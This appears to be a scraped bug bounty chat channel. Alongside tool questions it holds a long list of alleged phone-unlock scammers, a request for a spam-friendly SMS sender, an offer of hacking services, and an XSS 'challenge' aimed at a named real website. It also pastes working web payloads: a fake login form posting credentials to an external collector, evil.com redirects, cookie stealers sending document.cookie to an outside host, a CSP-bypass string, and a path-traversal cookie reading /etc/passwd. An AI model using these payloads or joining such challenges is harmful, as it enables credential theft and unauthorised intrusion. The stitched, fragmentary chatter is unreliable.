Talk and help about bugbounty
Guys, is this vulnerability important?
CVE-2023-39663
Second, if phone carriers are not valid and the SMS sender includes
Читать полностью…What causes sms contents to bounce while sending?
Читать полностью…hi guys,
how bypass this?
0 != i.indexOf("http") && 0 != i.indexOf("//") && (i = "//" + i)
are there any buddys could provide me with some refferences about the exploit of "Live off the land drivers"? Many thanks!
Читать полностью…Template clustured 318 ( Reduces 20794 request) Can anyone explain this too
Читать полностью…Most likely problem with your network connection. Nuclei cant connect to target host and skip it out
Читать полностью…UNLOCK SCAMMERS ON THE MARKET:
@fmiofficloudunlocks 😡big😡
@minacriis 😡big
@gsmunlocksxpert😡big
@iUnlock_Apple😡big
@iUnlock_Apple_US😡big
@cidunlocker
— A-Z—
@A4star1
@AAlienFuLL
@abracobras (@dgeUnlock)
@Ahmed_1928
@Applboy
@apple_hubs
@Apple_Support87
@apple_unlocking
@appledone
@applefishers
@AppleNewSolution (@OnlinehelpApp)
@appleSolution9
@ApsUnlocking
@arjan_unlock
@arsalangsm
@automatedpanel
@BaliUnlocker
@Bestunlockertz
@bLanc00fficial
@Boss_SmS
@BOSS_UNLOCK
@BossManTech
@DemonServices
@Ecampoverde
@elchapo55555
@Enemy17Tech
@fegunlocks
@financialservicex
@FineChina01 (@AmaizingF)
@finoallfino
@FMI_OFF_OFF
@Fmioff_new
@FoneZone
@gadum5
@ghana_reseller
@glk2050
@Gsm_Ahsan
@GSM_unl0cker
@gsmflashingmobil
@gsmonster2000
@gsms0lution (@EFI0Macbook0)
@GSMSMITH
@GSMSOLUTION100
@gsmsonic
@gsmunlocksxpert
@GSMT3CH
@gsmtanzania1
@Hackerbo_24
@HAFIZ_GSM
@iboyapple
@Icloud_kingg
@icloud_unlock123
@icloud0onoom
@iCloudBosssss4u
@icloudnumberon
@iHelloUnlocker
@imei4unlock
@iOSUnlocking
@iphonecare170
@Iphoneunlocksupport
@iSethos01
@isklm
@iunkownlcloud
@Iunlocker725
@iunlocker786apple
@javed_unlocks
@jevfx0
@John7726
@Johnkenedii
@JohTec
@JokerFmiKing
@kehlanaushan
@kelvin_hacks
@khaad47
@kitpro3
@knoxbypass
@l3gitch3ck
@LambdaICoder
@LeoSoft941Support_bot
@lifeg1
@lifeg1
@linkunlockingstore
@Lost_clean011
@Lost_clean4fast4
@Lost_Gulf_RSA
@mac1t1m1
@mankind56
@mankind56
@mankind56
@marikues
@markoj21
@matrixTopG1
@mikesshady
@mimshak3511
@Mkaburu2
@mobile_unlocks
@moh_apple_fix
@Moneyboss976
@Mr_iCl0ud
@n0stra
@Official_gsm_unlock
@Oliverjarb
@On_To_OFF
@PANEL1SERVICE
@passcodeadmin
@pedrounlocks
@phone_center_1
@Prof_Apple
@Raju3219
@rjctd00
@robsapple
@SA_Apple_Pvt
@sixtriger001
@SmartGSMSolutions
@SMDRAMDISK6
@SMITH706 (@Abhi4343)
@sms_kit
@Soh143
@sohail004
@styfan_here
@Superpandaunlock
@Sure9919
@sydneyza
@TankGsm
@Thefoxhimselff
@trimer0
@Unlock_GSM09
@unlockbestworld
@UnlockerDev
@unlockfastest
@Unlockicloud_Nades
@Usavisa12
@venom_unlocker
@xanderroman
@XpertCleanUnlockerr
@yacine_bennacer
@yamalencok (@kuataoo)
@zayna31
@Zer3K
List will be updated daily, don't deal with this guys.
Here will be added only scammers with proof. Don't come and request adding someone without proofs.
you can see Latest list : /channel/+fgD0OZiqEnNjMTA1
Unlock scammer list
240427
Hello guys , I'm running nuclei, but why do I always get skipped information, is it because of the network? Or is the SSH factor limited? Or are there other factors
Читать полностью…On my target.
I logout then intercept with Burpsuite then send to repeater and dropped the proxy.
I clear all the cookies in the request form then I generated PoC. I click on the PoC HTML file then it load then I got logout from my account.
Csrf vulnerability?
<A HREF="http://evil.com/">Login Here </A>
<script>document.location.href="http://evil.com"</script>
<h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>
csp bypass:
<script>alert(1)</script>&token=;script-src-elem 'unsafe-inline'
iframe:
"><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">
<IFRAME SRC="javascript:alert(document.cookie);"></iframe>
cookie stealer:
<script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie</script>
<script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script>
<script>document.body.background=”https://www.jhadol.com/images/photos/original/1465212129eukl.jpg“;</script>
<script>window.location=”https://coffinxp.000webhostapp.com/coffinxp1.html”;</script>
<script>document.body.bgColor=”red”;</script>
/gczdvn BBC cc xx Facebook vd scan bbbg feedback
Читать полностью…Can you recommend sender that allows spam contents ?
Читать полностью…🔥Challenge ⚡🕷️Xss🕷️⚡
📊level: Medium
🌐 Target:
https://www.transpakcorp.com
🔴rules:
👉Print your name, cookies, and...useragent
👉Share a screenshot of your proof and do not post the solution
Someone will help me with binary, I will help him with options trading.
Читать полностью…Are there any experts on WebSocket here? Is there an equivalent of Burp that can modify the contents of a WebSocket packet on the fly?
Читать полностью…Its optimization. Lets suppose than 5 templates make request to the /admin endpoint => templates clustered => all 5 templates will analyze response of 1 request to the /admin
Читать полностью…Actually my network is very normal, is there any possibility of restrictions from the VPS service provider?
Читать полностью…What do you mean skipped information,if you want more informative scan use -v or -vv
Читать полностью…If anyone needs help in hacking service message me up
Читать полностью…Has anyone ever heard of rudder encryption or seen it a request form
Читать полностью…How to find local file read vulnerabilities based on cookies.
Request
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/pasdwd
Response
HTTP/1.1 200 OK
...
Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//
#bugbounty #bugbountytip